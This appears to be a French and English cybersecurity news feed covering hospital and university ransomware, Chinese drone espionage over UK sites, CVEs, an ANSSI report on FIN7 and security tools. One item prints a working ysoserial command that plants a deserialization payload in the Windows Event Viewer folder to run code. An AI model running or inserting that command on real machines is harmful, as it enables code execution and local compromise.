🇺🇸 Systems are starting to get back online a week after Tenet Health (tenethealth.com
) was hit by a « cybersecurity incident » impacting 2 West Palm Beach hospitals. #usa #cyber #hospital #threats #healthcare #medical #databreach #santé #informatique
🇺🇸 Austin Peay State University (apsu.edu
) announced that they are under a ransomware attack. #usa #city #cyber #education #ransomware #databreach #informatique
🇨🇳 Beijing spooks are behind 18 drone sightings above UK military sites. The details of the drone activity were uncovered under freedom of information laws. A letter sent by MI6 security chiefs said Chinese spies are « aggressively » targeting 🇬🇧 British spooks and their families. Sources said the Chinese Foreign Intelligence Service is using tactics such as offers of sex, theft and cybercrime. #uk #military #china #espionage #drones #nuclear #threats #intel #cyber #informatique
https://www.dailyrecord.co.uk/news/scottish-news/chinese-drones-spy-scots-royal-26783425
Unsafe .Net Deserialization in Microsoft #Windows Event Viewer
ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews
// credit: Orange Tsai
🇫🇷 Depuis plusieurs semaines, des photos d'identité nécessaires pour constituer les dossiers des candidats au permis de conduire sont refusées par l'Agence Nationale des Titres Sécurisés (immatriculation.ants.gouv.fr
). La faute à un « bug » informatique affectant les clichés pris dans un Photomaton ®. #france #government #numérique #digital #outage #informatique
🇵🇪 Les opérateurs Conti revendiquent une attaque contre Dirección Nacional de Inteligencia (digimin.gob.pe
) #peru #government #cyber #conti #ransomware #threats #databreach #informatique
DJI will temporarily suspend all business activities in Russia and Ukraine.
https://www.dji.com/uk/newsroom/news/dji-statement-on-sales-compliance-efforts
Un attaquant profite d'une faille du système de gestion de la cryptomonnaie YEED. Grâce à l'achat et la revente successive et massive, l’utilisateur a pu générer des jetons de récompense qu’il a conservés afin de constituer son butin. Malheureusement, à la fin de l'attaque, ce dernier a oublié de récupérer ledit butin. Est-ce une erreur ? Cette attaque pourrait donc paraitre sans conséquence ni malheur. Et pourtant, basée sur la revente massive de jeton, a radicalement fait chuter le cours du YEED, ce dernier ne valant plus rien. #cyber #cryptocurrency #threats #informatique
Misconfigurations in Group Policies Overview (GPO), especially those involving file operations can be very dangerous #windows #cyber #threats #informatique
https://decoder.cloud/2022/04/25/a-not-so-common-and-stupid-privilege-escalation/
🇫🇷 Des câbles internet stratégiques ont été physiquement sectionnés pendant la nuit en région parisienne et dans l'est de la France. Le parquet de Paris a ouvert une enquête préliminaire mercredi soir pour « détérioration de bien de nature à porter atteinte aux intérêts fondamentaux de la Nation » #france #telecom #internet #outage #fibre #sabotage #threats #informatique
🔧 Memray - memory profiler for Python. It can track memory allocations, in native extension modules, and in the Python interpreter itself. It can generate several different types of reports to help you analyze the captured memory usage data. #tools #python #informatique
CVE-2022-29799 | CVE-2022-29800 - Vulnerabilities in the Linux systemd networkd-dispatcher component. #linux #vuln #cyber #threats #informatique
🇬🇧 CyberThreat 2022 is BACK!! CFP is OPEN! ( 12-13 September 2022 ) Park Plaza Westminster Bridge, London #uk #cyber #threats #informatique
🔧 How to use Speech Recognition to process our commands ? #tools #windows #informatique
CVE-2022-27775 Bad local IPv6 connection reuse. Due to errors in the logic, the config matching function did not take the IPv6 address zone id into account which could lead to libcurl reusing the wrong connection when one transfer uses a zone id and a subsequent transfer uses another (or no) zone id. #vuln #networks #cyber #threats #informatique
FIN7 est, avec Cobalt Gang, l'un des successeurs présumés du groupe cybercriminel Carbanak, actif de 2013 à 2015 et spécialisé dans les attaques à visée lucrative à l'encontre de systèmes d'information bancaires. L'arsenal de Cobalt Gang se compose de codes malveillants qui lui sont spécifiques (Kayslice, CobInt), de codes malveillants obtenus auprès du MaaS badbullzvenom (More_Eggs, Terra Loader), d'outils de tests d'intrusion et d'au moins un rançongiciel. Ainsi, ses liens historiques avec Carbanak, son arsenal varié, sa maîtrise des techniques de vol d'argent et son ciblage d'institutions financières européennes faisaient de Cobalt Gang l'un des groupes d'attaquants spécialisés dans le ciblage de banques les plus sophistiqués et les plus menaçants à l'encontre du secteur bancaire français. #cyber #banking #threats #report #informatique
https://www.cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf
🔧 KrbRelayUp - universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings) #tools #windows #informatique.
sc(r)apy | full metal packets
> We Are the Borg
> You Will be Assimilated
> Resistance is Futile